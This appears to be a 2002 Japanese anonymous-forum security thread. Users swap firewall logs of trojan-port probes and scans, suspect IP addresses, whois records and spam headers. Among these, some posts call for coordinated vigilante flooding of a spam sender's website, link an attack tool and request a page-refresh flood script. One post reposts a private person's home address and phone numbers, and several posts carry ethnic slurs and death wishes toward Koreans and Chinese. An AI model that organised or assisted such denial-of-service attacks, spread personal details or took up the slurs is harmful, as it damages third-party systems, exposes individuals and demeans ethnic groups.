大石英司には特に個人的興味はないけど、ようするに
あなたが自分で教えてあげられないのなら、
そこに書いてあることは当たってるんじゃないの？

05/02/2002 03:08:55.732620 tun0 @100:25 b ****.thrunet.ne.kr,1686 -> ****.ap.plala.or.jp,ftp PR tcp len 20 48 -S IN
05/02/2002 03:08:58.716590 tun0 @100:25 b ****.thrunet.ne.kr,1686 -> ****.ap.plala.or.jp,ftp PR tcp len 20 48 -S IN

なんかむかつく。

157.238.153.198

これ2ｃｈ見てると必ず繋がってる。
なんのIP？

>>345
俺のIP

[email protected]
荒らして下さい

P061198141209.ppp.prin.ne.jp
61.198.141.209

非常にうざいです。

s211-49-98-43.thrunet.ne.kr(211.49.98.43)
主にNetBusを多様する。

inetnum 202.81.240.0 - 202.81.247.255
netname NETFRONT-HK
descr Licensed Internet Service Provider in Hong Kong
descr provide dialup and leased line internet connection
country HK

昨日の夕方あたりから、ずーっと....
うちは鯖なんて立ててないyo＞66.180.230.6

Feb 8 08:08:40 ipmon[128]: 08:08:40 66.180.230.6,www -> *********.jp,****** PR tcp len 20 10240 -R IN
Feb 8 08:09:30 ipmon[128]: 08:09:29 66.180.230.6,www -> *********.jp,****** PR tcp len 20 10240 -R IN
Feb 8 08:10:18 ipmon[128]: 08:10:15 66.180.230.6,www -> *********.jp,****** PR tcp len 20 10240 -R IN
Feb 8 08:11:07 ipmon[128]: 08:11:06 66.180.230.6,www -> *********.jp,****** PR tcp len 20 10240 -R IN
Feb 8 08:11:55 ipmon[128]: 08:11:55 66.180.230.6,www -> *********.jp,****** PR tcp len 20 10240 -R IN
Feb 8 08:12:44 ipmon[128]: 08:12:43 66.180.230.6,www -> *********.jp,****** PR tcp len 20 10240 -R IN
Feb 8 08:13:32 ipmon[128]: 08:13:32 66.180.230.6,www -> *********.jp,****** PR tcp len 20 10240 -R IN
Feb 8 08:14:21 ipmon[128]: 08:14:20 66.180.230.6,www -> *********.jp,****** PR tcp len 20 10240 -R IN
Feb 8 08:15:10 ipmon[128]: 08:15:09 66.180.230.6,www -> *********.jp,****** PR tcp len 20 10240 -R IN

211.99.20.9.10
俺のシステムにもぐりこもーなんざ１８年はえー。馬鹿め！！

>>352 じゃああなたのＩＰ教えてください

18年後に遊びに行きます

202.69.84.155 うざすぎる。今日５回目

日付: 2002/02/08 時刻: 16:20:56
ｱﾄﾞﾚｽ 211.201.209.143 からの不正侵入の試みを規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡

最後に受けた攻撃：　2002/02/08 20:26:18
最近の不正侵入試行　4
最近の攻撃元：　1
最も頻度の高い攻撃元：　61.15.8.142

最後に受けた攻撃：　2002/02/08 21:42:40
最近の不正侵入試行　3
最近の攻撃元：　1
最も頻度の高い攻撃元：　211.219.9.234

c128.25.c3-net.ne.jp
61.208.128.25

2時間で212回。

『ハッキングの技が手に取るようにわかる本』って本を
書店で見かけたので覗いてみたら
((((((((((((((((((((((((( ;ﾟДﾟ))))))))))))))))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
ってなりました。恐ろしいことがｲﾊﾟｰｲ書いてました。
ｺｧｰｲ。ﾋｰ!!!

>>360
そんなタイトルの本ある？
いずれにしても厨房臭い名前だな。

ハッカープログラミング大全でも読んでなさいってこった。

>>360
って、ウザいやつなの？

>>362
その通り…。ウザい（厨房本の宣伝ばっかりしてる）ヤツの情報だ。

211.221.141.213 (TCP Port 3097) [TCP Flags: S].
Time: 2002/02/09 10:32:58

211.221.141.213 (TCP Port 3286) [TCP Flags: S].
Time: 2002/02/09 10:33:02

211.221.141.213 (TCP Port 3448) [TCP Flags: S].
Time: 2002/02/09 10:33:06

211.221.141.213 (TCP Port 3679) [TCP Flags: S].
Time: 2002/02/09 10:33:10

朝に繋げてから15分おきにこのIPをぞぬがブロック。
10時半になったらいきなりこの有様。
なんだろうなあ？とwho isすると
KORNET KOREA TELECOM・・・正直うざい・・・

[email protected]
　コイツはうざすぎます。

RIFcd-05p106.ppp.odn.ad.jp
こいつ調子のりすぎだよ。

グローバルじゃないけど192.168.2.70がうざいって
わからんべな

いい加減切れたのでカンコックからのパケットを全部ハネたい
んだけど、IPアドレスでうまく集合指定する方法ない？
やっぱ毎回毎回逆引きしないとダメ？

>>368
nimda関係のスレにカンコック＆チュウゴックのIPアドレスリストがあった
ような気が…

218.149.75.34
韓国の人やめてけれ

210.57.17.224
64.56.179.46

>>368
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=kr

さっき来ましたー。koreanらしい。

2002/02/09 22:05:57
rules "Default Block Backdoor/SubSeven Trojan"
Details: In bound TCP connection
remote addresses, and service 210.183.39.244 and 3668

This IP address space has been allocated to KRNIC.
KRNIC=Korea Network Information Center

203.78.89.70

う　ぜ　え

ハッキングとかって全然わからないんですが
3dd5227d.catv296.ne.jp
このＩＰの人は掲示板荒らしたり、かなりうざいです。

[email protected]
４ネ！

>>376

それ、うちにもきたよ、ネズミだろ？

ピアノと遊ぶ会　会長 （作曲・ピアノ）
日本アマチュア演奏家協会（ＡＰＡ・エイパ）元、プロデュース担当理事 　　 岡田克彦　　　　　　　　　　　　　　　　　　　
〒760-0004　香川県高松市西宝町2-9-10 B-1-102
Tel.Fax. 087(861)4349　　携帯電話．090-7570-3124
ホームページＵＲＬ；http://www.geocities.co.jp/MusicHall/5933/
Ｅメールアドレス；[email protected]

こいつはウェブ板その他で狂ったように同じ内容（個人情報含む）を
コピペして2ちゃんを荒らしてる不届きものだ。
こいつのせいでウェブ板は機能不全に陥っている。
2ちゃんをあらされて放っておくようではセキュリティ板が泣くぞ。

ただ今、迷惑メール送信元を一斉訪問中につきボランティア募集中！！！

目標は www.lime-jp.com

★★★迷惑メール送信元を叩く！！その１★★★ ＠ニュー速板

http://choco.2ch.net/test/read.cgi/news/1013261390/

■ツールはこちらで入手
ttp://members.tripod.co.jp/kusokuso/index.html
■戦果報告スレ＠携帯・PHS板
http://cheese.2ch.net/test/read.cgi/phs/1013258545/
■★★迷惑メールを考える！！その７★★＠携帯･PHS板
http://cheese.2ch.net/test/read.cgi/phs/1012209335/l50

スパムキラーなるスクリプトきぼーん
同じWinでフレームを開きまくって更新しまくるやつ

KOREAN多杉
02/02/10 1:54:36
Backdoor/SubSeven Trojan
211.59.14.200,3566

いいんですが、なんと13:15の記録で

不正侵入試行　３
最近の攻撃元　１
最も頻度の高い攻撃元　　61.10.205.127

この前は韓国でしたが、これから調べます

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

inetnum: 61.78.0.0 - 61.85.255.255
netname: KORNET
descr: KOREA TELECOM
descr: KOREA TELECOM Internet Operating Center
country: KR
admin-c: DL276-AP
tech-c: WK81-AP
remarks: ******************************************
remarks: Allocated to KRNIC Member.
remarks: If you would like to find assignment
remarks: information in detail please refer to
remarks: the KRNIC Whois Database at:
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed: [email protected] 20010511
changed: [email protected] 20010627
source: APNIC

person: Dongjoo Lee
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: DL276-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010523
source: APNIC

person: Won Kang
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: WK81-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010523
source: APNIC

inetnum: 61.79.218.0 - 61.79.221.255
netname: KORNET-XDSL-BUCHEON-KR
descr: BUCHUN NODE
descr: 360 SIMKOK3DONG WONMIKU BUCHEONSI
descr: KYONGGI
descr: 420-013
country: KR
admin-c: GP327-KR
tech-c: WK737-KR
remarks: This IP address space has been allocated to KRNIC.
remarks: For more information, using KRNIC Whois Database
remarks: whois -h whois.nic.or.kr
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20020204
source: KRNIC

person: GilSoon Park
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: GP327-KR
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20020204
source: KRNIC

この方々にメールしてみてよろしいでしょうか？
「何か私に御用ですか？」
日本語通じるかな？

61.10.129.246　 　
こいつなんとかして

外出先でもお気軽に無料で利用できる携帯端末専用掲示板を作成
しました。ちょっとした情報交換に、コミュニケーションに気分転換が
てら楽しめていただければと送信させて頂いています。
http://hotshot.jp
にて閲覧ができます。お気軽にご利用下さいませ。
会員登録は無料です。無料掲示板があります。男女共に可能です。
女性は完全無料です。女同士、男同士、仲間掲示板などもあり、
一部、女性めーる友達専用掲示板、仲間募集掲示板などは無料掲示板
とはちがった、特別な閲覧もできる機能もついております。
当然、無料のままでも遊べます。
また、ご不要であればこのまま返信していただければ幸です。
アダルト系ではございません。どうしてもアダルトのご利用は
http://www.nyan3.com/
にてご利用下さい。女性は当然無料です。メールアドレス非公開です。
また、ご不要の場合。お手数ですがご返信していただければ幸です。
寒くなりつつありますが、風邪には気をつけてよい2月を迎えたいもの
です。まもなくバレンタインデイ♪よい出会いがありますように。

あなたが検索されたアドレス［ 61.215.183.140 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.215.183.0
b. [ネットワーク名] KATCH-NET
f. [組織名] 株式会社キャッチネットワーク
g. [Organization] KATCH Network Inc.
m. [運用責任者] TK998JP
n. [技術連絡担当者] NK2872JP
p. [ネームサーバ] ns.katch.ne.jp
p. [ネームサーバ] ns2.katch.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/09/21
[返却年月日]
[最終更新] 2001/09/21 17:12:07 (JST)
[email protected]

もう10分くらいやってる・・・ウザすぎ

>>388
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 10 Feb 2002 14:14:16 GMT
工事中だとさ。。。（ｗ

207.71.92.221
147.208.171.140

61.215.152.79

ケーブルでやるとはイイ度胸してるじゃねぇの（ｗ

>>392
そこニムダ仕込んでるね・・・
オモロイ奴だね（藁

最後に受けた攻撃：　2002/02/10 23:52:42
最近の不正侵入試行　3
最近の攻撃元：　1
最も頻度の高い攻撃元：　203.218.4.16

61.215.45.143

ttp://www.hamq.jp/
中国にクラックされてるよ！

あなたが検索されたアドレス［ HAMQ.jp ］のJPNICからの応答は以下の通りです。

Domain Information: [ドメイン情報]
[Domain Name] HAMQ.JP

[登録者名] サイトクリック株式会社
[Registrant] siteclick.co.,ltd

[Name Server] ns1.site-click.net
[Name Server] ns2.site-click.net

[登録年月日] 2001/06/28
[有効期限] 2002/06/30
[状態] Active
[最終更新] 2001/12/03 18:17:16 (JST)

Contact Information: [公開連絡窓口]
[名前] サイトクリック株式会社
[Name] siteclick co.,ltd
[Email] [email protected]
[Email] [email protected]
[郵便番号] 220-0073
[住所] 神奈川県横浜市西区岡野1-13-5
[Postal Address] 1-13-5,okano
yokohama city
[電話番号] 045-290-7510
[FAX番号]

>>396
で、なんで分かったんだ？
従業員か？（ｗ

ニュー板ですがな。

61.75.5.238

また同じ奴。

最後に受けた攻撃：　2002/02/11 2:13:50
最近の不正侵入試行　6
最近の攻撃元：　2
最も頻度の高い攻撃元：　203.218.4.16

日付: 02/02/11 時刻: 14:30:32
規則「Default Block Backdoor/SubSeven Trojan」が ****,27374 をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ****,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.208.46.217,3218
ﾌﾟﾛｾｽ名は N/A

最後に受けた攻撃：　2002/02/11 15:30:01
最近の不正侵入試行　3
最近の攻撃元：　1
最も頻度の高い攻撃元：　61.77.228.140

最後に受けた攻撃：　2002/02/11　18：35：42
最近の不正侵入試行：　4
最近の攻撃元:　1
最も頻度の高い攻撃元：　211.190.69.242
氏ね

最後に受けた攻撃：　2002/02/11　20：15：42
最近の不正侵入試行：　7
最近の攻撃元:　2
最も頻度の高い攻撃元：　211.190.69.242
コリャ陣氏ね

最後に受けた攻撃：　2002/02/11 21:42:44
最近の不正侵入試行　1072
最近の攻撃元：　1
最も頻度の高い攻撃元：　147.208.171.140

Return-Path: <[email protected]>
Received: from terra.saku2.com (210.235.76.111)
by post.tok2.com with SMTP; 11 Feb 2002 08:36:23 -0000
Received: (qmail 1164 invoked from network); 11 Feb 2002 17:43:20 +0900
Received: from unknown (HELO ?192.168.0.191?) (61.207.95.253)
by terra.saku2.com with SMTP; 11 Feb 2002 17:43:20 +0900
User-Agent: Microsoft-Outlook-Express-Macintosh-Edition/5.02.2106
Date: Mon, 11 Feb 2002 17:43:10 +0900
From: "[email protected]" <[email protected]>
Message-ID: <B88DB32E.67BE%[email protected]>
Mime-version: 1.0
Content-type: text/plain; charset="ISO-2022-JP"
Content-transfer-encoding: 7bit

ＦＴＴＨの私としては瞬時してしまったわけですが、それにしても、攻撃としてはあ
まりの低レベルにちょっと困惑してます。

http://mbspro7.uic.to/user/sumadx.html

みなさん、スパムメールきたら、IPアドレスからネットワーク管理者を調べて
スパムメールヘッダーを記述して、連絡しましょう

私の場合、IPアドレス、接続時刻からMACアドレスを調べだし個人を特定でき、
警告してもらえる旨の連絡を、ネットワーク管理者からいただきました。

みなさんが、私と同じように悪をたたく姿勢をみせれば、少なくとも発信者は
いやな思いをして、ちょっとは懲りるかもしれませんね

61.82.132.117
61.215.148.13
61.188.177.100
61.161.166.196
61.0.152.97
61.177.209.4

連続攻撃でウザイ
偶然か？

>>410
Codered�Uは、近いIPアドレスを集中的に攻撃したな。
だから「お隣さん」ばっかりだったりする。
Nimdaはどうだっけ？

202.224.128.6
202.224.128.50

ほかにやることないのか、ヒマ人が！
氏ね！

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.206.96.0-61.206.103.0
b. [ネットワーク名] MNI-ISP-0001
f. [組織名] 宮城ネットワーク株式会社
g. [Organization] Miyagi Network Inc.
m. [運用責任者] RS215JP
n. [技術連絡担当者] SF210JP
p. [ネームサーバ] ns0.mni.ne.jp
p. [ネームサーバ] ns1.mni.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/05/18
[返却年月日]
[最終更新] 2001/06/12 13:06:09 (JST)
[email protected]

宮城ネットワーク株式会社って？

今検索中

218.119.120.1
YahooBB218119120001.bbtec.net

随分と悪行を働いておるようですよ、お代官様。
そろそろ天誅が必要かと思われ。

61.210.145.9

最近韓国IPが多いけど、韓国のウィルス対策はどうなってるんだろう。

211.129.63.213
157.14.130.251

195.232.52.25

ドイツから来たｗ

cj3278184-a.kasiw1.kn.home.ne.jp IP:61.24.200.130

時間, イベント, カウント, パラメータ
02/02/11 16:45:44, SNMP port probe, 1, port=161&reason=Firewalled
02/02/11 16:57:36, TCP port scan, 102, port=11|21|23|25|53|70|79-80|110-111|119|443|512-515|1433|1521|1525|3762|5000&reason=Firewalled
02/02/11 19:21:34, TCP port scan, 94, port=11|21|23|25|53|70|79-80|110-111|119|443|512-515|1433|1521|1525|3762|5000&reason=Firewalled

回数とポートの数がむかつく。

日付: 02/02/12 時刻: 0:58:05
ｱﾄﾞﾚｽ 61.73.159.88 からの不正侵入の試みを規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡
以降のｱｸｾｽを 30 分間遮断しました｡

日付: 02/02/12 時刻: 0:56:31
ｱﾄﾞﾚｽ 61.78.194.239 からの不正侵入の試みを規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡
以降のｱｸｾｽを 30 分間遮断しました｡
ﾉｰﾄｿが防いでくれた........感謝。

168.248.36.68←port80叩厨
202.99.11.89←port111叩厨

いい加減にしてくれ…(;´Д｀)
頼む…氏んでくれ…(;´Д｀)
ヽ(｀Д´#)ノｳﾜｧｧｧｧｧﾝ!!

IP のログがあるんだから Whois　で ISP調べて　日本のプロバイダだったら、そこにメール送ったらいいよ。

ちゃんとした文章で、あなたのところの会員が不正アクセスしてきます、非常に迷惑な行為なので厳正なる処置をお願いしたいと思います。ってね。

　もっといい書き方あるかも・・・

　きっとプロバイダ側からおしかりを受けてショボーン（´Д｀；）となるよ。気まずくなるだろうし。

あほーＢＢから執拗に宣伝を書き込んでいます。

うぃ 名前： テリオス [2002/02/11,16:31:12]
下のリンクはとっとこハム太郎が大嫌いな人だけが見れます。
http//urume.cool.ne.jp/ug/ugzonetop.html http//urume.cool.ne.jp/
下のリンクは、お金が欲しいガメツイ方だけが見れます。
http//urume.cool.ne.jp/ http//urume.cool.ne.jp/
良質画像だけを載せている 画像倉庫
http//urume.cool.ne.jp/av/http//urume.cool.ne.jp/av/

218.115.164.
inetnum:218.112.0.0 - 218.143.255.255
netname:BBTECH descr:BB Technology Corp.
person:Takeshi Tsutsui
address:Nihonbashi Hakozaki bldg.
address:24-1,Nihonbashi Hakozaki-Cho
Chuo-ku,Tokyo,103-0015,Japan
[email protected]

>>421
どうもです(*´∀｀*）
出来ればそうします。

62.179.190.20

211.222.238.248
また同じとこから。

24.58.245.120

192.168.1.1

http://my.vector.co.jp/servlet/System.FileDownload/download/ftp/0/217070/pack/win95/amuse/joke/hikaru04.zip
こいつウザイ

202.98.130.42

IP: 210.221.96.38
DNS: s210-221-96-38.thrunet.ne.kr
Node: ｹﾚｰ豎
Group: <C7>ﾑ
MAC: 00E029658E50

こいつキモくない?

64.242.116.8

ちぇっ、また、三角木馬サービスか。

202.224.128.6
パナネット
最近ここからの port scan　がうざい。

202.212.116.1　ぷららさん
202.85.50.200　ゆにしすてむ？

130.69.251.23

ログ見てて気が付いたんだけど、こいつかなりしつこくやってたみたいだ。

>>435

あなたが検索されたアドレス［ 130.69.251.23 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 130.69.0.0
b. [ネットワーク名] UTNET1
f. [組織名] 東京大学
g. [Organization] University of Tokyo
m. [運用責任者] MN010JP
n. [技術連絡担当者] MN010JP
n. [技術連絡担当者] AK003JP
p. [ネームサーバ] ns.nc.u-tokyo.ac.jp
p. [ネームサーバ] ns2.nc.u-tokyo.ac.jp
p. [ネームサーバ] ns.s.u-tokyo.ac.jp
y. [通知アドレス] [email protected]
[割当年月日]
[返却年月日]
[最終更新] 1998/10/22 14:08:07 (JST)
[email protected]

規則「Default Block Backdoor/SubSeven Trojan」が a,27374 をﾌﾞﾛｯｸしました｡
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは a,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.215.7.161,4565
ﾌﾟﾛｾｽ名は N/A

規則「Default Block NetBus Trojan」が a,NetBus をﾌﾞﾛｯｸしました｡
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは a,NetBus
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.197.144.168,3863
ﾌﾟﾛｾｽ名は N/A

規則「Default Block Backdoor/SubSeven Trojan」が a,27374 をﾌﾞﾛｯｸしました｡
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは a,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.59.212.128,4564
ﾌﾟﾛｾｽ名は N/A

規則「Default Block Backdoor/SubSeven Trojan」が a,27374 をﾌﾞﾛｯｸしました｡
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは a,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.209.195.89,2283
ﾌﾟﾛｾｽ名は N/A

毎日攻撃食らい、ウィルス感染。画面が崩れていきます。
ノートンウィルス全てのファイルチェックで引っ掛らないのでやむなくフォーマット。
一体何でしょうか。

>>437
よーするにウイルス感染してないんじゃない？
画面が崩れるのは別の原因だと思うけどな・・・

最後に受けた攻撃：　2002/02/13 10:42:08
最近の不正侵入試行　1
最近の攻撃元：　1
最も頻度の高い攻撃元：　24.24.15.202

最後に受けた攻撃：　2002/02/13 12:22:48
最近の不正侵入試行　1
最近の攻撃元：　2
最も頻度の高い攻撃元：　211.114.194.180

>>436

それってどうやるの？？

Domain Information: [ドメイン情報]
a. [ドメイン名] KEIO.GR.JP
e. [そしきめい] けいおうだいがく だいがくいん おーびーおーじかい けいおーぐるーぷ
f. [組織名] 慶応義塾大学大学院OB・OG会 慶応グループ
g. [Organization] Society of Postgraduates KeiouUniversity
k. [組織種別] 任意団体
l. [Organization Type] Group
m. [登録担当者] HM1561JP
n. [技術連絡担当者] EH026JP
p. [ネームサーバ] miz.hypersys.co.jp
p. [ネームサーバ] naou.hypersys.co.jp
y. [通知アドレス] [email protected]
[状態] Connected (2002/04/30)
[登録年月日] 1999/04/07
[接続年月日] 1999/04/13
[最終更新] 2001/06/06 13:15:57 (JST)
[email protected]

Domain Information: [ドメイン情報]
a. [ドメイン名] SONYTELECOM.AD.JP
e. [そしきめい] そにーかぶしきかいしゃ
f. [組織名] ソニー株式会社
g. [Organization] Sony Corporation
k. [組織種別] JPNIC会員ネットワーク
l. [Organization Type] JPNIC member's network
m. [登録担当者] TT2737JP
n. [技術連絡担当者] KN5085JP
n. [技術連絡担当者] MK5616JP
n. [技術連絡担当者] YY1710JP
p. [ネームサーバ] ns1.bit-drive.ne.jp
p. [ネームサーバ] tky01ns01fe0.sonytelecom.ad.jp
y. [通知アドレス] [email protected]
[状態] Connected (2002/12/31)
[登録年月日] 1999/12/01
[接続年月日] 2000/03/01
[最終更新] 2001/07/31 13:44:08 (JST)
[email protected]

攻撃された！

210.175.13.57
俺のIPだ。ハックノ練習してごらんよ。できねーだろうけどｗ

>>438
御指摘とおり再起動で元通り。何が原因だったのだ???

IP: 64.71.140.82
DNS: descartes2.he.net
ここ最悪、なんども来る。
ネット警察とかひましてたら、ここの検挙たのむよ。

http://freebbs.fargaia.com/html/code1216.html

最後に受けた攻撃：　2002/02/13 18:35:10
最近の不正侵入試行　4
最近の攻撃元：　3
最も頻度の高い攻撃元：　62.252.79.70

最後に受けた攻撃：　2002/02/13 20:18:28
最近の不正侵入試行　4
最近の攻撃元：　1
最も頻度の高い攻撃元：　216.226.5.61

>>444
書面で署名捺印の上、ご相談ください。
いかなるケースにおいても、損害に伴う賠償は応じられません。

>>444 は誰にも相手されなくて寂しいカマって君でしょ。

61.168.249.250

またチャイナだよ・・・
何回Ｔｒｙしてんだよ〜
いい加減あきらめてくれ

61.78.159.184
間コック

俺のIPだ・・・・・・・・
ハックってもできないと思うけどね・・・・・・・
IPは教えませぬ
まだ攻撃されていませぬ

IPだけでハッキングなんて出来るの？ってもしかして厨房丸だし？

ちょっと質問なんですが、軽度の荒らしにやられてる掲示板のソースより
抜き出してたんですが・・・
nttchba08148.ppp.infoweb.ne.jp（61.121.36.48）
（）内はpingの結果
これって生ですよねぇ・・・

211.230.47.59
トロイ送ってきた。

ｶﾝｺｯｸやりたい放題だよぅ

From:ClickForMail < [email protected] >
To: [email protected]
Subject:Re:Your Background Investigation
Date***
Received: from [64.37.121.131] by ** with ESMTP **
From**,**
X-Info:To report abuse forward this mail to [email protected]
Please include all mail header fields!
Message-ID:<[email protected] >
--
If you would like to opt-out of ClickforMail Special Offers click here:
http://em5000.com/unsub.php?client=click4mail&email=click4mail@complaints.em5000.com
---
You are receiving this message as a valued member of the ClickforMail Special
Offers program.
NOW you can do backround investigations of your neighbors, employees,
friends and neighbors, using YOUR COMPUTER AT HOME OR WORK!
In fact, YOU CAN FIND OUT THE TRUTH ABOUT ANYONE.
It's FAST, its EASY and its FUN.
NET DETECTIVE 2002 is an amazing new tool that allows you to dig up
facts about anyone. It is all completely legal, and you can use it in
the privacy of your own home without anyone ever knowing. It's cheaper
and faster than hiring a private investigator.
For more information click here:
http://affiliates.jeanharris.com/cgi-bin/clickthru.cgi?pid=NDB&sid=clickformail
NET DETECTIVE 2002 is endorsed by the National Association of
Independent Private Investigators (NAIPI)

>>459
単なる広告メールじゃないの？

From:realbigoffers_com< [email protected] >
To: [email protected]
Subject:re:Great offer from Video Professor!
Date**
Received: from [64.37.114.73] by ** with ESMTP id **
X-Info: To report abuse forward this mail to [email protected] Please include all mail header fields!
Message-ID:< [email protected] >
---
Just choose from any of the 16 titles available and you'll get that title FREE*.
It's the ideal way to learn the computer -- my
"what-you-see-is-what-you-do" learning method is foolproof! It's a
lot faster than manuals, easier than classes, and yours FREE* today!
- John W. Scherer, Founder & CEO, Video Professor
*You only pay $6.95 shipping and handling conveniently billed to your
Visa, Mastercard, American Express of Discover card. When you order,
you will also received additional lessons to review without
obligation to purchase.IBM & PC compatible computers only. Limit one
free lesson per household. Running time is approximately 60 minutes.
Some restrictions may apply.
---
To unsubscribe click here or go to
http://em5000.net/unsub.php?client=real_big_offers_com&msgid=12579638549
and enter your email address ( [email protected] )

Korea Internet Information Service V1.0 ( created by KRNIC, 2001.6 )

2001鰍 7杉 2析採斗澗 鯵識吉 Whois 辞搾什研 旋遂馬壱 赤柔艦陥.
query: 211.254.43.78
# ENGLISH
IP Address : 211.254.43.0-211.254.43.127
Network Name : ISSAN-LLINE-INCUBETECH
Connect ISP Name : ISSAN
Connect Date : 20010410
Registration Date : 20010503
[ Organization Information ]
Orgnization ID : ORG208790
Org Name : Incube Technology Co. Ltd
State : SEOUL
Address : 40-17 3-ga, Hangang-ro Yongsan-ku
Zip Code : 140-880
[ Admin Contact Information]
Name : Tae-Hee Jang
Org Name : Incube Technology Co. Ltd
State : SEOUL
Address : 40-17 3-ga, Hangang-ro Yongsan-ku
Zip Code : 140-880
Phone : +82-2-709-8184
Fax : +82-2-709-8453
E-Mail : [email protected]
[ Technical Contact Information ]
Name : Tae-Hee Jang
Org Name : Incube Technology Co. Ltd
State : SEOUL
Address : 40-17 3-ga, Hangang-ro Yongsan-ku
Zip Code : 140-880
Phone : +82-2-709-8184
Fax : +82-2-709-8453
E-Mail : [email protected]

2002/02/12 3:13:10 規則「Default Block Backdoor/SubSeven Trojan」が ore,27374 をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ore,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 62.238.77.100,1985
2002/02/12 3:13:04 規則「Default Block Backdoor/SubSeven Trojan」が ore,27374 をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ore,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 62.238.77.100,1985
ﾌﾟﾛｾｽ名は N/A
2002/02/12 3:13:00 規則「Default Block Backdoor/SubSeven Trojan」が ore,27374 をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ore,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 62.238.77.100,1985
2002/02/12 2:55:15 規則「Default Block Backdoor/SubSeven Trojan」が ore,27374 をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ore,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 66.156.208.198,2772
2002/02/12 2:55:09 規則「Default Block Backdoor/SubSeven Trojan」が ore,27374 をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ore,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 66.156.208.198,2772
2002/02/12 2:55:05 規則「Default Block Backdoor/SubSeven Trojan」が ore,27374 をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ore,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 66.156.208.198,2772

これは、ブロックしたってことは侵入は防いだけども応答は返してるってことですよね。
ノートンなんですけど。ゾーンアラームみたいにステルスになってないですよね？なんかイヤだなあ。

>>463 貼り付け厨房は来んでいいぞ。
内容の意味わかってないだろ？

>>465 内容の意味も何も、見たまんまじゃないか。SubSevenしかけられてる奴のポートが開いてないかどうか調べてるんだろ。
厨といっしょにするな。ここなら、もっと情報が得られるかと思ったのさ。文章長いとすぐ頭に血が上るタイプ？

